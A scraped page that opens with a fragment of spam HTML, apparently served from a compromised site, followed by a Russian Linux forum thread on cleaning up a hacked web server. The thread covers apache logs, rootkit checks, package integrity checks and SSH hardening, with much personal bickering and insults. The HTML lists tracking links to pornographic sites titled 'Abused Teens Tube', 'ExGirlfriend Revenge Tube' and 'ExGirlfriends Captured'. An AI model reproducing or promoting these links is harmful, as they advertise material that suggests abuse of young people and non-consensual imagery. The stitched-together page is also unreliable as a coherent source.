href="http://www.freelifetimexxxpass.com/track/Y68HAIGAgIAAHwAAc210cDUA/?d=signup">           <img src="http://www.a1971.com/tempe/FLP_top3.jpg">        </a></div>  <div class="content">		<ul>	           <li><a target="_blank" href="http://www.abusedteenstube.com/track/Y68HAIGAgIAAEwAAc210cDUA/"><p>Abused Teens Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/AbusedTeens.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeanimexxxtube.com/track/Y68HAIGAgIAABwAAc210cDUA/"><p>Free Anime XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAnimeXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.bigtitstofucktube.com/track/Y68HAIGAgIAAGQAAc210cDUA/"><p>Big Tits Fuck Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/BigTitsToFuckTube.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.monstercocksxxxtube.com/track/Y68HAIGAgIAAEQAAc210cDUA/"><p>Monster Cock XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/MonsterCockXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.teenpornxxxtube.com/track/Y68HAIGAgIAAFQAAc210cDUA/"><p>Teen Porn XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/TeenPornXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeamateurtubexxx.com/track/Y68HAIGAgIAABQAAc210cDUA/"><p>Free Amateur XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAmateurTubeXXX.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.juicyteenstube.com/track/Y68HAIGAgIAAEAAAc210cDUA/"><p>Juicy Teens Tobe FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/JuicyTeensTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freehardcoretubexxx.com/track/Y68HAIGAgIAACgAAc210cDUA/"><p>Free Hardcore Tube XXX</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeHardcoreTubeXXX.jpg"></a></li>	           <li><a target="_blank" href="http://www.exgirlfriendrevengetube.com/track/Y68HAIGAgIAAFgAAc210cDUA/"><p>ExGirlfriend Revenge Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/ExgirlfriendRevenge.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://secure.watchmygf.com/track/MjE1MjIyOjI6MQ/"><p>Watch My GF $1only</p><img width="298" height="198" src="http://www.a1971.com/tempe/ama_watchmygf.jpg"></a></li>	           <li><a target="_blank" href="http://secure.meandmyasian.com/track/MjE1MjIyOjI6MTE/"><p>Me And My Asian $1only</p><img width="298" height="198" src="http://www.a1971.com/tempe/ama_asian.jpg"></a></li>	           <li><a target="_blank" href="http://www.freetrannytubexxx.com/track/Y68HAIGAgIAADwAAc210cDUA/"><p>Free Tranny XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeTrannyTubeXXX.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.freelesbianxxxtube.com/track/Y68HAIGAgIAADAAAc210cDUA/"><p>Free Lesbian XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreelesbianXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.cartoonxxxtube.com/track/Y68HAIGAgIAAAgAAc210cDUA/"><p>Cartoon XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/CartoonXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeasiansxxxtube.com/track/Y68HAIGAgIAACAAAc210cDUA/"><p>Free Asian XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAsiansXXXTube.jpg"></a></li>	    </ul>				<ul>	           <li><a target="_blank" href="http://www.freemilftubexxx.com/track/Y68HAIGAgIAADQAAc210cDUA/"><p>Free Milf XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeMilfTubeXXX.jpg"></a></li>	           <li><a target="_blank" href="http://www.exgirlfriendscaptured.com/track/Y68HAIGAgIAAFwAAc210cDUA/"><p>ExGirlfriends Captured</p><img width="298" height="198" src="http://www.a1971.com/tempe/ExgirlfriendsCaptured.jpg"></a></li>	           <li><a target="_blank" href="http://www.freegayxxxtube.com/track/Y68HAIGAgIAACQAAc210cDUA/"><p>Free Gay XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeGayXXXTube.jpg"></a></li>	    </ul>	   </div>   </div></body></html>

Качаю теперь логи apach2 всего-то 9Gb... Какие еще логи стоит смотреть и изучать?

Перемещено mono из admin

Tomoyo решето?
Иран + серфинг + линукс

1 2 3 4 5 6
Ответ на: комментарий от emulek

По уму, да, нужно заново устанавливать систему.

Как правило, я смотрю, не установлен ли руткит самописной чекалкой: она сравнивает адреса функций типа fopen, fread, execve, readdir, accept в загруженной библиотеке и в libc. Если они не совпадают, значит, кто-то их перехватывает. Это тоже не слишком надежно, это можно обойти, но пока ни один из известных руткитов это не обходит. Тут только переустановка системы.

Если руткитов нет, то я смотрю на integrity файлов из пакетов, типа debsums или rpm -Va. Если какие-то бинарные файлы изменены (например, ssh и sshd), то тут уж лучше все заканчивать переустановкой системы, но можно, в принципе, обойтись.

У автора, вероятнее всего, а .htaccess были права на запись из-под пользователя веб-сервера, а значит, скорее всего root-права на сервере не были получены. Пересустанавливать систему не нужно, нужно только вычистить весь вредоносный код из скриптов и устранить все уязвимости в них.

ValdikSS ★★★★★
()
Ответ на: комментарий от TDrive

Привари к корпусу сервера металлическую решетку и якорь, это будет еще одна ступень защиты.

Не стоит доводить до абсурда, такая штука действительно практикуется:

https://en.wikipedia.org/wiki/Layered_security

anonymous
()
Ответ на: комментарий от xtraeft

С батей бесполезно говорить, это ад.
Вот таким должен быть технический форум, да?:)

Да его просто забанить надо в очередной раз, шоб не сеял тут свои эротишные фантазии.

tazhate ★★★★★
()

ТС походу слишком занят чтобы отвечать в теме...
и зачем таким «отзывчивым» оказывать помощь ><

reprimand ★★★★★
()
Ответ на: комментарий от tazhate

Да его просто забанить надо в очередной раз

А смысл в бане, если он опять зарегистрируется?
Система скора идиотская - любой дебил может писать что угодно в техразделах и вводить новичков в заблуждение. А в толксах (где информация маловажная, по сути) писать могут лишь те, кто надрочили в техразделах тупым звездежом. Жаль, что матом нельзя на лоре :(

xtraeft ★★☆☆
()

А вообще, то когда у меня на серваке были аккаунты для каждого человека, который со мной работал (хорошо что так сделал), то проверял и логировал user agent.
Очередной заход с венды - предупреждение. На 3-й раз - разрыв договора. В итоге только 1 человек остался исключая меня.
Вот такая вот, печальная практика.

reprimand ★★★★★
()
Ответ на: комментарий от xtraeft

Ты очень крутой

это комплимент или тонкий упрек?

че за контора

никакая не контора. Собственный проект, над которым вместе работали.

эгоистичных

в чем эгоизм?

reprimand ★★★★★
()
Ответ на: комментарий от TDrive

У меня сейчас, там где нужно доступ по ключам, рут не залочен но пароль хрен подберешь. Что я выиграю заведя левого пользователя и настроив судо?

На лоре одобрят, че. Тут все равно большинство не вдупляет ни во что, и бегают с «РУТОМ ЛОГИНИТЬСЯ НЕЛЬЗЯ» как с писаной торбой.

Догмы сосут.

xtraeft ★★☆☆
()
Ответ на: комментарий от reprimand

никакая не контора. Собственный проект, над которым вместе работали.

А, тогда извиняюсь. Тем не менее, мне не понятно - если у вас админ зашел из винды - все, договор рвете? Кучеряво живете.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

хорошо что удалил то сообщение

кстати, у тебя хороший вышел способ определения

Открыл себя - открыл других. Надо запомнить это на будущее, спасибо.

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

В итоге только 1 человек остался исключая меня.

Хыхыхы, сорри, как-то пропустил этот момент. Ну показательно, что тут скажешь :)

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

админ

не админ. Один из разработчиков, работавших на проекте. До админа таким людям как пешком до луны.

зашел из винды - все, договор рвете

нет. Сначала я предупреждаю о мерах безопасности
Потом 2 раза в случае события (я это кстати указал в своем первом посте этой темы) еще предупреждения
На третий раз - разрыв договора

Если до человека не доходит - что я могу сделать? Жертвовать? Подставлять других? Нет уж, лучше потерять раньше немного, чем потом - всё.

reprimand ★★★★★
()
Ответ на: комментарий от xtraeft

да не надо. Просто всегда было интересно что за сайты крутятся у местных админов. Вдруг что-то интересное. Я не «кулцхакер» как тут думают местные неадекваты и некоторые адекваты.

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

Просто всегда было интересно что за сайты крутятся у местных админов.

Я не местный, я не админ, и я не «кручу сайты». У меня доменов больше 2 тысяч, если че ^^

Я не «кулцхакер» как тут думают местные неадекваты и некоторые адекваты.

Да просто бате что-то объяснять бесполезно - он старый баран с начинающимся маразмом, поэтому и удалил пост ;)

xtraeft ★★☆☆
()
Ответ на: комментарий от reprimand

ага. если человек пренебрегает мерами безопасности и венда вся завирусованная, то если поставить ему убунту, он умнее от этого не станет.

BMX ★★☆
()
Последнее исправление: BMX (всего исправлений: 1)
Ответ на: комментарий от reprimand

Если до человека не доходит - что я могу сделать? Жертвовать? Подставлять других? Нет уж, лучше потерять раньше немного, чем потом - всё.

Да винда там вобще не виновата, просто ты свое самолюбие тешишь.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

Я не местный
xtraeft ★★★ (01.06.2014 0:59:36)

да тут все не местные, ага.

я не админ, и я не «кручу сайты»

возможно, ты неправильно понял выражение «кручу сайты». А может быть я зря употребил его. Неважно...

У меня доменов больше 2 тысяч, если че ^^

это ненавязчивый способ мерятся членами? Я вот только 3 нашел.

бате

а почему вы его называете «батя»?
у меня к нему, например, просто приписано:

emulek (31.05.2014 21:49:08) резкий не к месту

старый

так он еще и старик? лол

reprimand ★★★★★
()
Ответ на: комментарий от BMX

он умнее от этого не станет

а мне и не нужно чтобы он становился умнее. Ему эта убунта - как камень на голову.
Но перезагрузиться в дуалбут ему ничего не стоило.

reprimand ★★★★★
()

Самое смешное, что по сабжу никто и не высказался.
Всем похер на суть проблемы, все не глядя валят на винду. А разгадка то проста - дырявый wp/плагины, возможно старое ядро (благо, недавно под линукс кернел было несколько хороших рабочих сплойтов). Могу помочь написать абузу в вап-партнерку (если уж сильно бомбит), но на сервере все равно грязь останется.

uname -a покажи еще, хоть будет понятно - руткит или нет.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

Да винда там вобще не виновата

и проститутки с наркотиками тоже не виноваты в местных клубах, да-да

просто ты свое самолюбие тешишь

эх... было бы перед кем и что тешить.

reprimand ★★★★★
()
Ответ на: комментарий от xtraeft

Самое смешное, что по сабжу никто и не высказался.

мой первый пост в теме:

ТС походу слишком занят чтобы отвечать в теме...

у тебя там libastral.so свежий, я вижу? :)

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

да тут все не местные, ага.

Ну мне несколько лет назад стало неинтересно тут, захожу почитать интересные мне темы.

это ненавязчивый способ мерятся членами? Я вот только 3 нашел.

Нет, не способ :) Если сильно хочется пообщаться, оставь контакт - стукну.

а почему вы его называете «батя»?

www.linux.org.ru/people/drBatty/profile

так он еще и старик? лол

Говорит что староват. Про это точно не знаю, но то что он тупой - это факт.

xtraeft ★★☆☆
()
Ответ на: комментарий от reprimand

у тебя там libastral.so свежий, я вижу? :)

И что ты сказал по делу? Мне на самом деле было бы интересно поболтать на лоре про секьюрити линукс серверов (хотя бы веб), но кроме tazhate тут вроде особо никто не вдупляет. Или по крайней мере молчат.

//гы, тачпад сдох.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

www.linux.org.ru/people/drBatty/profile

спасибо за ссылку, буду знать :)

Блокирован 19.08.2013 0:39:20, модератором beastie по причине: по результату голосования модераторов

лол. А что он натворил-то?

Нет, не способ :) Если сильно хочется пообщаться, оставь контакт - стукну.

как-нибудь позже. Пока нечего демонстрировать из собственного. А остальное - не комильфо :)

reprimand ★★★★★
()

cast mono

По моему нужно переместить в security

snaf ★★★★★
()
Ответ на: комментарий от reprimand

как-нибудь позже. Пока нечего демонстрировать из собственного. А остальное - не комильфо :)

Да и я не хочу тебе ничего демонстрировать, просто не понял, как ты по моему одному ip сделал какие то выводы :-P.

лол. А что он натворил-то?

Дебил. Почитай, там пиздец.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

я бы сказал по делу, будь немного больше информации. Поциент уже 2 темы создал, но не сказал где болит.
Как ему помочь? Посоветовать сходить в местную клинику?

кроме tazhate тут вроде особо никто не вдупляет. Или по крайней мере молчат.

тажат хоть и дело говорит, но, порой неадекватит немного. Остальные либо пропускают темы, либо молчат. Неизвестно что происходит чаще

reprimand ★★★★★
()
Ответ на: комментарий от xtraeft

в профиле? видел. Крайне люто. Думал, что что-то другое...

reprimand ★★★★★
()
Ответ на: комментарий от reprimand

я бы сказал по делу, будь немного больше информации. Поциент уже 2 темы создал, но не сказал где болит.

Да, я что-то этот момент упустил. Ну тем более скучно тут тогда :)

тажат хоть и дело говорит, но, порой неадекватит немного.

Да он еще брайана кребса читает и приводит как авторитетный источник - это совсем уж :D

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

Ну тем более скучно тут тогда :)

здесь недавно какой-то очередной «нескучный» заменитель ЛОРа пиарили. зашел, увидел что там в админах батя и эдичка. закрыл вкладку.

BMX ★★☆
()
Ответ на: комментарий от BMX

Дело в контенте, а не людях.
Вот сабж, например, мне интересен. Интересны мне (ну, если мы только про раздел Security) и треды с обсуждением кернел эксплоитов, но они как правило не содержат полезной информации совсем. Вообще, никогда.

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

Вот например, как должны выглядеть треды с обсуждением PoC для ведра https://rdot.org/forum/showthread.php?t=2720
И это только паблик. А на лоре только избитые шутки «ой, это еще и конпелять нужно» и прочий бред.

xtraeft ★★☆☆
()
Последнее исправление: xtraeft (всего исправлений: 1)
Ответ на: комментарий от xtraeft

А на лоре только избитые шутки «ой, это еще и конпелять нужно» и прочий бред.

когда-то это было смешно, но сейчас ЛОР этим разъедает себя изнутри, да. модераторы даже пытались пару раз удалять все эти «РЕШЕТО» и «ненужно», но результата это никакого не дало. вообще.

BMX ★★☆
()
Последнее исправление: BMX (всего исправлений: 1)
Ответ на: комментарий от BMX

а ведь все эти «РЕШЕТО» и «НЕНУЖНО» (в случае правдивости в конкретном случае) являются некоторым шармом ЛОР-а, без которого ЛОР - не ЛОР.

reprimand ★★★★★
()
Ответ на: комментарий от TDrive

ты это Марку Шатлвроту скажи. Ладно я дурак, он тоже?

Причем тут он?

в убунте sudo по дефолту так настроено. Думаешь, зачем?

emulek
()
Ответ на: комментарий от TDrive

Я не вижу проблемы в засирании логов.

ты вообще ничего не видишь. А вот если тебе понадобится решить какую-то проблему?

emulek
()
Ответ на: комментарий от TDrive

В данном случае я тебе задал прямой вопрос и было бы интересно услышать ответ, если конечно есть что сказать.

я уже сказал:

1. настроить доступ по ключу от обычного юзера

2. сменить порт на $RANDOM

3. закрыть вход root'у и вход по паролю вообще.

Конечно это не панацея, но от 99.999% атак это убережёт.

emulek
()
Ответ на: комментарий от emulek

в убунте sudo по дефолту так настроено. Думаешь, зачем?

Вот и спросил бы у Марка - «Зачем?». Могу предположить, убунта создавалась как десктопный дистр, то есть серверная убунта это обрезанная десктопная убунта и пересматривать политику безопасности для серверной убунты Марку тупо лень.
Мне бы если честно тоже было бы лень, ведь админы не дураки сами настроят как им нужно, че напрягаться.

TDrive ★★★★★
()
Ответ на: комментарий от ValdikSS

Если руткитов нет, то я смотрю на integrity файлов из пакетов, типа debsums или rpm -Va. Если какие-то бинарные файлы изменены (например, ssh и sshd), то тут уж лучше все заканчивать переустановкой системы, но можно, в принципе, обойтись.

chkrootkit делает тоже самое.

У автора, вероятнее всего, а .htaccess были права на запись из-под пользователя веб-сервера, а значит, скорее всего root-права на сервере не были получены. Пересустанавливать систему не нужно, нужно только вычистить весь вредоносный код из скриптов и устранить все уязвимости в них.

возможно. Мне отсюда плохо видно.

emulek
()
Ответ на: комментарий от emulek

Конечно это не панацея, но от 99.999% атак это убережёт.

Поставить на рут бессмысленный пароль из 10+ символов точно так же убережет от 99.999% атак. Так какая разница?

TDrive ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2 3 4 5 6
Tomoyo решето?
Security
Иран + серфинг + линукс